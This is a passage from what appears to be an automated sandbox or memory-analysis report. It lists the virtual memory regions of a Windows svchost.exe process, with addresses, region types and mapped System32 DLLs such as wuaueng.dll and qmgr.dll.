0x0 region_type = private name = "private_0x000000cbffde0000" filename = "" Region: id = 586 start_va = 0xcbffee0000 end_va = 0xcbfffdffff entry_point = 0x0 region_type = private name = "private_0x000000cbffee0000" filename = "" Region: id = 587 start_va = 0x7df5ff400000 end_va = 0x7ff5ff3fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff400000" filename = "" Region: id = 588 start_va = 0x7ff78740c000 end_va = 0x7ff78740dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78740c000" filename = "" Region: id = 589 start_va = 0x7ff78740e000 end_va = 0x7ff78740ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78740e000" filename = "" Region: id = 590 start_va = 0x7ff787410000 end_va = 0x7ff787411fff entry_point = 0x0 region_type = private name = "private_0x00007ff787410000" filename = "" Region: id = 591 start_va = 0x7ff787412000 end_va = 0x7ff787413fff entry_point = 0x0 region_type = private name = "private_0x00007ff787412000" filename = "" Region: id = 592 start_va = 0x7ff787414000 end_va = 0x7ff787415fff entry_point = 0x0 region_type = private name = "private_0x00007ff787414000" filename = "" Region: id = 593 start_va = 0x7ff787416000 end_va = 0x7ff787417fff entry_point = 0x0 region_type = private name = "private_0x00007ff787416000" filename = "" Region: id = 594 start_va = 0x7ff787418000 end_va = 0x7ff787419fff entry_point = 0x0 region_type = private name = "private_0x00007ff787418000" filename = "" Region: id = 595 start_va = 0x7ff78741a000 end_va = 0x7ff78741bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78741a000" filename = "" Region: id = 596 start_va = 0x7ff78741c000 end_va = 0x7ff78741dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78741c000" filename = "" Region: id = 597 start_va = 0x7ff78741e000 end_va = 0x7ff78741ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78741e000" filename = "" Region: id = 598 start_va = 0x7ff787420000 end_va = 0x7ff787421fff entry_point = 0x0 region_type = private name = "private_0x00007ff787420000" filename = "" Region: id = 599 start_va = 0x7ff787422000 end_va = 0x7ff787423fff entry_point = 0x0 region_type = private name = "private_0x00007ff787422000" filename = "" Region: id = 600 start_va = 0x7ff787424000 end_va = 0x7ff787425fff entry_point = 0x0 region_type = private name = "private_0x00007ff787424000" filename = "" Region: id = 601 start_va = 0x7ff787426000 end_va = 0x7ff787427fff entry_point = 0x0 region_type = private name = "private_0x00007ff787426000" filename = "" Region: id = 602 start_va = 0x7ff787428000 end_va = 0x7ff787429fff entry_point = 0x0 region_type = private name = "private_0x00007ff787428000" filename = "" Region: id = 603 start_va = 0x7ff78742a000 end_va = 0x7ff78742bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78742a000" filename = "" Region: id = 604 start_va = 0x7ff78742c000 end_va = 0x7ff78742dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78742c000" filename = "" Region: id = 605 start_va = 0x7ff78742e000 end_va = 0x7ff78742ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78742e000" filename = "" Region: id = 606 start_va = 0x7ff787430000 end_va = 0x7ff787431fff entry_point = 0x0 region_type = private name = "private_0x00007ff787430000" filename = "" Region: id = 607 start_va = 0x7ff787432000 end_va = 0x7ff787433fff entry_point = 0x0 region_type = private name = "private_0x00007ff787432000" filename = "" Region: id = 608 start_va = 0x7ff787434000 end_va = 0x7ff787435fff entry_point = 0x0 region_type = private name = "private_0x00007ff787434000" filename = "" Region: id = 609 start_va = 0x7ff787436000 end_va = 0x7ff787437fff entry_point = 0x0 region_type = private name = "private_0x00007ff787436000" filename = "" Region: id = 610 start_va = 0x7ff787438000 end_va = 0x7ff787439fff entry_point = 0x0 region_type = private name = "private_0x00007ff787438000" filename = "" Region: id = 611 start_va = 0x7ff78743a000 end_va = 0x7ff78743bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78743a000" filename = "" Region: id = 612 start_va = 0x7ff78743c000 end_va = 0x7ff78743dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78743c000" filename = "" Region: id = 613 start_va = 0x7ff78743e000 end_va = 0x7ff78743ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78743e000" filename = "" Region: id = 614 start_va = 0x7ff787440000 end_va = 0x7ff787441fff entry_point = 0x0 region_type = private name = "private_0x00007ff787440000" filename = "" Region: id = 615 start_va = 0x7ff787442000 end_va = 0x7ff787443fff entry_point = 0x0 region_type = private name = "private_0x00007ff787442000" filename = "" Region: id = 616 start_va = 0x7ff787444000 end_va = 0x7ff787445fff entry_point = 0x0 region_type = private name = "private_0x00007ff787444000" filename = "" Region: id = 617 start_va = 0x7ff787446000 end_va = 0x7ff787447fff entry_point = 0x0 region_type = private name = "private_0x00007ff787446000" filename = "" Region: id = 618 start_va = 0x7ff787448000 end_va = 0x7ff787449fff entry_point = 0x0 region_type = private name = "private_0x00007ff787448000" filename = "" Region: id = 619 start_va = 0x7ff78744a000 end_va = 0x7ff78744bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78744a000" filename = "" Region: id = 620 start_va = 0x7ff78744c000 end_va = 0x7ff78744dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78744c000" filename = "" Region: id = 621 start_va = 0x7ff78744e000 end_va = 0x7ff78744ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78744e000" filename = "" Region: id = 622 start_va = 0x7ff787450000 end_va = 0x7ff787451fff entry_point = 0x0 region_type = private name = "private_0x00007ff787450000" filename = "" Region: id = 623 start_va = 0x7ff787452000 end_va = 0x7ff787453fff entry_point = 0x0 region_type = private name = "private_0x00007ff787452000" filename = "" Region: id = 624 start_va = 0x7ff787454000 end_va = 0x7ff787455fff entry_point = 0x0 region_type = private name = "private_0x00007ff787454000" filename = "" Region: id = 625 start_va = 0x7ff787456000 end_va = 0x7ff787457fff entry_point = 0x0 region_type = private name = "private_0x00007ff787456000" filename = "" Region: id = 626 start_va = 0x7ff787458000 end_va = 0x7ff787459fff entry_point = 0x0 region_type = private name = "private_0x00007ff787458000" filename = "" Region: id = 627 start_va = 0x7ff78745a000 end_va = 0x7ff78745bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78745a000" filename = "" Region: id = 628 start_va = 0x7ff78745c000 end_va = 0x7ff78745dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78745c000" filename = "" Region: id = 629 start_va = 0x7ff78745e000 end_va = 0x7ff78745ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78745e000" filename = "" Region: id = 630 start_va = 0x7ff787460000 end_va = 0x7ff787461fff entry_point = 0x0 region_type = private name = "private_0x00007ff787460000" filename = "" Region: id = 631 start_va = 0x7ff787462000 end_va = 0x7ff787463fff entry_point = 0x0 region_type = private name = "private_0x00007ff787462000" filename = "" Region: id = 632 start_va = 0x7ff787464000 end_va = 0x7ff787465fff entry_point = 0x0 region_type = private name = "private_0x00007ff787464000" filename = "" Region: id = 633 start_va = 0x7ff787466000 end_va = 0x7ff787467fff entry_point = 0x0 region_type = private name = "private_0x00007ff787466000" filename = "" Region: id = 634 start_va = 0x7ff787468000 end_va = 0x7ff787469fff entry_point = 0x0 region_type = private name = "private_0x00007ff787468000" filename = "" Region: id = 635 start_va = 0x7ff78746a000 end_va = 0x7ff78746bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78746a000" filename = "" Region: id = 636 start_va = 0x7ff78746c000 end_va = 0x7ff78746dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78746c000" filename = "" Region: id = 637 start_va = 0x7ff78746e000 end_va = 0x7ff78746ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78746e000" filename = "" Region: id = 638 start_va = 0x7ff787470000 end_va = 0x7ff787471fff entry_point = 0x0 region_type = private name = "private_0x00007ff787470000" filename = "" Region: id = 639 start_va = 0x7ff787472000 end_va = 0x7ff787473fff entry_point = 0x0 region_type = private name = "private_0x00007ff787472000" filename = "" Region: id = 640 start_va = 0x7ff787474000 end_va = 0x7ff787475fff entry_point = 0x0 region_type = private name = "private_0x00007ff787474000" filename = "" Region: id = 641 start_va = 0x7ff787476000 end_va = 0x7ff787477fff entry_point = 0x0 region_type = private name = "private_0x00007ff787476000" filename = "" Region: id = 642 start_va = 0x7ff787478000 end_va = 0x7ff787479fff entry_point = 0x0 region_type = private name = "private_0x00007ff787478000" filename = "" Region: id = 643 start_va = 0x7ff78747a000 end_va = 0x7ff78747bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78747a000" filename = "" Region: id = 644 start_va = 0x7ff78747c000 end_va = 0x7ff78747dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78747c000" filename = "" Region: id = 645 start_va = 0x7ff78747e000 end_va = 0x7ff78747ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78747e000" filename = "" Region: id = 646 start_va = 0x7ff787480000 end_va = 0x7ff787481fff entry_point = 0x0 region_type = private name = "private_0x00007ff787480000" filename = "" Region: id = 647 start_va = 0x7ff787482000 end_va = 0x7ff787483fff entry_point = 0x0 region_type = private name = "private_0x00007ff787482000" filename = "" Region: id = 648 start_va = 0x7ff787484000 end_va = 0x7ff787485fff entry_point = 0x0 region_type = private name = "private_0x00007ff787484000" filename = "" Region: id = 649 start_va = 0x7ff787486000 end_va = 0x7ff787487fff entry_point = 0x0 region_type = private name = "private_0x00007ff787486000" filename = "" Region: id = 650 start_va = 0x7ff787488000 end_va = 0x7ff787489fff entry_point = 0x0 region_type = private name = "private_0x00007ff787488000" filename = "" Region: id = 651 start_va = 0x7ff78748a000 end_va = 0x7ff78748bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78748a000" filename = "" Region: id = 652 start_va = 0x7ff78748c000 end_va = 0x7ff78748dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78748c000" filename = "" Region: id = 653 start_va = 0x7ff78748e000 end_va = 0x7ff78748ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78748e000" filename = "" Region: id = 654 start_va = 0x7ff787490000 end_va = 0x7ff787491fff entry_point = 0x0 region_type = private name = "private_0x00007ff787490000" filename = "" Region: id = 655 start_va = 0x7ff787492000 end_va = 0x7ff787493fff entry_point = 0x0 region_type = private name = "private_0x00007ff787492000" filename = "" Region: id = 656 start_va = 0x7ff787494000 end_va = 0x7ff787495fff entry_point = 0x0 region_type = private name = "private_0x00007ff787494000" filename = "" Region: id = 657 start_va = 0x7ff787496000 end_va = 0x7ff787497fff entry_point = 0x0 region_type = private name = "private_0x00007ff787496000" filename = "" Region: id = 658 start_va = 0x7ff787498000 end_va = 0x7ff787499fff entry_point = 0x0 region_type = private name = "private_0x00007ff787498000" filename = "" Region: id = 659 start_va = 0x7ff78749a000 end_va = 0x7ff78749bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78749a000" filename = "" Region: id = 660 start_va = 0x7ff78749c000 end_va = 0x7ff78749dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78749c000" filename = "" Region: id = 661 start_va = 0x7ff78749e000 end_va = 0x7ff78749ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78749e000" filename = "" Region: id = 662 start_va = 0x7ff7874a0000 end_va = 0x7ff7874a1fff entry_point = 0x0 region_type = private name = "private_0x00007ff7874a0000" filename = "" Region: id = 663 start_va = 0x7ff7874a2000 end_va = 0x7ff7874a3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7874a2000" filename = "" Region: id = 664 start_va = 0x7ff7874a4000 end_va = 0x7ff7874a5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7874a4000" filename = "" Region: id = 665 start_va = 0x7ff7874a6000 end_va = 0x7ff7874a7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7874a6000" filename = "" Region: id = 666 start_va = 0x7ff7874a8000 end_va = 0x7ff7874a9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7874a8000" filename = "" Region: id = 667 start_va = 0x7ff7874aa000 end_va = 0x7ff7874abfff entry_point = 0x0 region_type = private name = "private_0x00007ff7874aa000" filename = "" Region: id = 668 start_va = 0x7ff7874ac000 end_va = 0x7ff7874adfff entry_point = 0x0 region_type = private name = "private_0x00007ff7874ac000" filename = "" Region: id = 669 start_va = 0x7ff7874ae000 end_va = 0x7ff7874affff entry_point = 0x0 region_type = private name = "private_0x00007ff7874ae000" filename = "" Region: id = 670 start_va = 0x7ff7874b0000 end_va = 0x7ff7875affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7874b0000" filename = "" Region: id = 671 start_va = 0x7ff7875b0000 end_va = 0x7ff7875d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7875b0000" filename = "" Region: id = 672 start_va = 0x7ff7875d4000 end_va = 0x7ff7875d4fff entry_point = 0x0 region_type = private name = "private_0x00007ff7875d4000" filename = "" Region: id = 673 start_va = 0x7ff7875d6000 end_va = 0x7ff7875d7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7875d6000" filename = "" Region: id = 674 start_va = 0x7ff7875d8000 end_va = 0x7ff7875d9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7875d8000" filename = "" Region: id = 675 start_va = 0x7ff7875da000 end_va = 0x7ff7875dbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7875da000" filename = "" Region: id = 676 start_va = 0x7ff7875dc000 end_va = 0x7ff7875ddfff entry_point = 0x0 region_type = private name = "private_0x00007ff7875dc000" filename = "" Region: id = 677 start_va = 0x7ff7875de000 end_va = 0x7ff7875dffff entry_point = 0x0 region_type = private name = "private_0x00007ff7875de000" filename = "" Region: id = 678 start_va = 0x7ff787ec0000 end_va = 0x7ff787eccfff entry_point = 0x7ff787ec0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 679 start_va = 0x7ffadf2b0000 end_va = 0x7ffadf3d1fff entry_point = 0x7ffadf2b0000 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 680 start_va = 0x7ffadf820000 end_va = 0x7ffadf8e3fff entry_point = 0x7ffadf820000 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 681 start_va = 0x7ffae0590000 end_va = 0x7ffae05e7fff entry_point = 0x7ffae0590000 region_type = mapped_file name = "newdev.dll" filename = "\\Windows\\System32\\newdev.dll" (normalized: "c:\\windows\\system32\\newdev.dll") Region: id = 682 start_va = 0x7ffae07c0000 end_va = 0x7ffae0820fff entry_point = 0x7ffae07c0000 region_type = mapped_file name = "wuuhext.dll" filename = "\\Windows\\System32\\wuuhext.dll" (normalized: "c:\\windows\\system32\\wuuhext.dll") Region: id = 683 start_va = 0x7ffae0830000 end_va = 0x7ffae0a59fff entry_point = 0x7ffae0830000 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 684 start_va = 0x7ffae0b10000 end_va = 0x7ffae0b5cfff entry_point = 0x7ffae0b10000 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll") Region: id = 685 start_va = 0x7ffae1820000 end_va = 0x7ffae18a3fff entry_point = 0x7ffae1820000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 686 start_va = 0x7ffae60a0000 end_va = 0x7ffae60b1fff entry_point = 0x7ffae60a0000 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 687 start_va = 0x7ffae6330000 end_va = 0x7ffae6395fff entry_point = 0x7ffae6330000 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 688 start_va = 0x7ffae63a0000 end_va = 0x7ffae63b2fff entry_point = 0x7ffae63a0000 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 689 start_va = 0x7ffae63c0000 end_va = 0x7ffae63cafff entry_point = 0x7ffae63c0000 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 690 start_va = 0x7ffae63d0000 end_va = 0x7ffae64f0fff entry_point = 0x7ffae63d0000 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 691 start_va = 0x7ffae8b60000 end_va = 0x7ffae8fc9fff entry_point = 0x7ffae8b60000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 692 start_va = 0x7ffae9240000 end_va = 0x7ffae92c2fff entry_point = 0x7ffae9240000 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 693 start_va = 0x7ffae92d0000 end_va = 0x7ffae92e5fff entry_point = 0x7ffae92d0000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 694 start_va = 0x7ffae92f0000 end_va = 0x7ffae93c7fff entry_point = 0x7ffae92f0000 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 695 start_va = 0x7ffae93d0000 end_va = 0x7ffae9432fff entry_point = 0x7ffae93d0000 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 696 start_va = 0x7ffae9440000 end_va = 0x7ffae9464fff entry_point = 0x7ffae9440000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 697 start_va = 0x7ffae9470000 end_va = 0x7ffae9483fff entry_point = 0x7ffae9470000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 698 start_va = 0x7ffae9490000 end_va = 0x7ffae9587fff entry_point = 0x7ffae9490000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 699 start_va = 0x7ffae9590000 end_va = 0x7ffae9602fff entry_point = 0x7ffae9590000 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 700 start_va = 0x7ffae9610000 end_va = 0x7ffae9746fff entry_point = 0x7ffae9610000 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 701 start_va = 0x7ffae9770000 end_va = 0x7ffae9797fff entry_point = 0x7ffae9770000 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 702 start_va = 0x7ffae9fa0000 end_va = 0x7ffae9fb0fff entry_point = 0x7ffae9fa0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 703 start_va = 0x7ffae9fc0000 end_va = 0x7ffae9fd0fff entry_point = 0x7ffae9fc0000 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 704 start_va = 0x7ffae9fe0000 end_va = 0x7ffaea05ffff entry_point = 0x7ffae9fe0000 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 705 start_va = 0x7ffaea0a0000 end_va = 0x7ffaea11ffff entry_point = 0x7ffaea0a0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 706 start_va = 0x7ffaea5c0000 end_va = 0x7ffaea5d0fff entry_point = 0x7ffaea5c0000 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 707 start_va = 0x7ffaea5e0000 end_va = 0x7ffaea856fff entry_point = 0x7ffaea5e0000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 708 start_va = 0x7ffaea860000 end_va = 0x7ffaea876fff entry_point = 0x7ffaea860000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 709 start_va = 0x7ffaea880000 end_va = 0x7ffaea8c5fff entry_point = 0x7ffaea880000 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 710 start_va = 0x7ffaea8d0000 end_va = 0x7ffaea90ffff entry_point = 0x7ffaea8d0000 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 711 start_va = 0x7ffaea910000 end_va = 0x7ffaea957fff entry_point = 0x7ffaea910000 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 712 start_va = 0x7ffaea980000 end_va = 0x7ffaea994fff entry_point = 0x7ffaea980000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 713 start_va = 0x7ffaea9a0000 end_va = 0x7ffaea9b9fff entry_point = 0x7ffaea9a0000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 714 start_va = 0x7ffaea9c0000 end_va = 0x7ffaea9ccfff entry_point = 0x7ffaea9c0000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 715 start_va = 0x7ffaea9d0000 end_va = 0x7ffaea9e1fff entry_point = 0x7ffaea9d0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 716 start_va = 0x7ffaeae70000 end_va = 0x7ffaeaf06fff entry_point = 0x7ffaeae70000 region_type = mapped_file name = "settingsync.dll" filename = "\\Windows\\System32\\SettingSync.dll" (normalized: "c:\\windows\\system32\\settingsync.dll") Region: id = 717 start_va = 0x7ffaeaf10000 end_va = 0x7ffaeaf20fff entry_point = 0x7ffaeaf10000 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 718 start_va = 0x7ffaeb090000 end_va = 0x7ffaeb371fff entry_point = 0x7ffaeb090000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 719 start_va = 0x7ffaeb520000 end_va = 0x7ffaeb52dfff entry_point = 0x7ffaeb520000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 720 start_va = 0x7ffaeb530000 end_va = 0x7ffaeb56ffff entry_point = 0x7ffaeb530000 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 721 start_va = 0x7ffaeb690000 end_va = 0x7ffaeb6eefff entry_point = 0x7ffaeb690000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 722 start_va = 0x7ffaeb6f0000 end_va = 0x7ffaeb6f9fff entry_point = 0x7ffaeb6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 723 start_va = 0x7ffaeb700000 end_va = 0x7ffaeb9a6fff entry_point = 0x7ffaeb700000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 724 start_va = 0x7ffaebb50000 end_va = 0x7ffaebb5bfff entry_point = 0x7ffaebb50000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 725 start_va = 0x7ffaebc80000 end_va = 0x7ffaebc94fff entry_point = 0x7ffaebc80000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 726 start_va = 0x7ffaebca0000 end_va = 0x7ffaebce0fff entry_point = 0x7ffaebca0000 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 727 start_va = 0x7ffaebd70000 end_va = 0x7ffaec0acfff entry_point = 0x7ffaebd70000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 728 start_va = 0x7ffaec0b0000 end_va = 0x7ffaec0ccfff entry_point = 0x7ffaec0b0000 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 729 start_va = 0x7ffaec0d0000 end_va = 0x7ffaec133fff entry_point = 0x7ffaec0d0000 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 730 start_va = 0x7ffaec140000 end_va = 0x7ffaec17efff entry_point = 0x7ffaec140000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 731 start_va = 0x7ffaec180000 end_va = 0x7ffaec197fff entry_point = 0x7ffaec180000 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 732 start_va = 0x7ffaec1a0000 end_va = 0x7ffaec1c2fff entry_point = 0x7ffaec1a0000 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 733 start_va = 0x7ffaec1d0000 end_va = 0x7ffaec214fff entry_point = 0x7ffaec1d0000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 734 start_va = 0x7ffaec220000 end_va = 0x7ffaec310fff entry_point = 0x7ffaec220000 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 735 start_va = 0x7ffaec320000 end_va = 0x7ffaec334fff entry_point = 0x7ffaec320000 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 736 start_va = 0x7ffaec410000 end_va = 0x7ffaec419fff entry_point = 0x7ffaec410000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 737 start_va = 0x7ffaec420000 end_va = 0x7ffaec437fff entry_point = 0x7ffaec420000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 738 start_va = 0x7ffaec440000 end_va = 0x7ffaec5c2fff entry_point = 0x7ffaec440000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 739 start_va = 0x7ffaec5d0000 end_va = 0x7ffaec66efff entry_point = 0x7ffaec5d0000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 740 start_va = 0x7ffaec670000 end_va = 0x7ffaec6cafff entry_point = 0x7ffaec670000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 741 start_va = 0x7ffaec6d0000 end_va = 0x7ffaec6fdfff entry_point = 0x7ffaec6d0000 region_type = mapped_file name = "wmidcom.dll" filename = 